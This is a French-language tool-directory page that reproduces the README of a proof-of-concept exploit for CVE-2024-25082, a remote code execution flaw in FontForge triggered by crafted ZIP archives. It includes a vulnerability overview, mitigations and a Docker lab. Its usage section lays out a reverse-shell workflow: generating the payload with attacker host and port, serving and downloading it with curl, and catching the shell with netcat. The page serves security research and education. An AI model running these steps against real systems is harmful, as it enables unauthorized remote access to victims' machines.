Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25082 — Exploit de preuve de concept pour CVE-2024-25082, démontrant l'exécution de code à distance dans FontForge via des archives ZIP fabriquées. Inclut un générateur de payload, un laboratoire Docker et un rapport technique pour la recherche en sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/moamenx8/cve-2024-25082
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

Exploit de preuve de concept pour CVE-2024-25082, démontrant l'exécution de code à distance dans FontForge via des archives ZIP fabriquées. Inclut un générateur de payload, un laboratoire Docker et un rapport technique pour la recherche en sécurité et l'éducation.

Voir le dépôt
5il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ CVE-2024-25082 - Exécution de code à distance via ZIP dans FontForge (PoC)

License Python CVE

Exploit de preuve de concept pour CVE-2024-25082, une vulnérabilité affectant FontForge qui permet l'exécution de code à distance (RCE) via une archive ZIP malveillante.

Ce dépôt montre comment la vulnérabilité peut être exploitée dans un environnement de laboratoire contrôlé à des fins de recherche en sécurité et d'éducation.


Aperçu de la vulnérabilité

  • Identifiant CVE : CVE-2024-25082\
  • Logiciel affecté : FontForge\
  • Type de vulnérabilité : Exécution de code à distance\
  • Vecteur d'attaque : Archive ZIP malveillante\
  • Impact : Exécution de commandes arbitraires lors du traitement de l'archive conçue.

La vulnérabilité survient en raison d'une validation inadéquate des fichiers contenus dans les archives ZIP, permettant à un attaquant d'exécuter des commandes arbitraires sur le système cible.


Structure du dépôt

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

Fichier Description


exploit.py Génère la charge utile ZIP malveillante poc/ Contient les fichiers de preuve de concept générés writeup.md Explication technique de la vulnérabilité


Prérequis

  • Python 3.x
  • Netcat

Installer les outils facultatifs :

root@kitploit:~
sudo apt install netcat

Utilisation

1️⃣ Générer la charge utile malveillante

root@kitploit:~
python3 exploit.py --lhost <Votre IP> --lport <Votre Port>

Cela générera un fichier exploit.zip malveillant.


2️⃣ Servir l'exploit

root@kitploit:~
python3 -m http.server 8080

3️⃣ Téléchargement depuis le système cible

root@kitploit:~
curl http://<Votre IP>:8080/exploit.zip -o /chemin/vers/le/répertoire/de/téléchargement/exploit.zip

4️⃣ Attraper le shell inversé

root@kitploit:~
nc -lvnp <Votre Port>

En cas de succès, un shell devrait être obtenu depuis le système cible.


Reproduction de la vulnérabilité

Un environnement vulnérable reproductible est fourni dans le répertoire docker/.

Exemple :

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

Cela permet des tests sécurisés sans affecter les systèmes de production.


Impact sur la sécurité

Un attaquant capable de télécharger ou de contrôler des fichiers ZIP traités par l'application vulnérable peut :

  • Exécuter des commandes système arbitraires
  • Obtenir un accès shell distant
  • Compromettre le système hôte

Atténuation

Étapes d'atténuation recommandées :

  • Mettre à jour FontForge vers une version corrigée
  • Valider le contenu des archives téléchargées
  • Restreindre la fonctionnalité de téléversement de fichiers
  • Utiliser le sandboxing lors du traitement des polices

Avertissement

Ce dépôt contient un code de preuve de concept pour une vulnérabilité divulguée publiquement.

Le code est fourni strictement pour :

  • Recherche en sécurité
  • Fins éducatives
  • Tests de pénétration autorisés

N'utilisez PAS ce code contre des systèmes sans autorisation explicite.

L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.


Auteur

Moamen Elmaghrabi

Étudiant en cybersécurité
Tests de pénétration et développement d'exploits


Licence

Ce projet est sous licence MIT.
Consultez le fichier LICENSE pour plus de détails.

Télécharger l’outil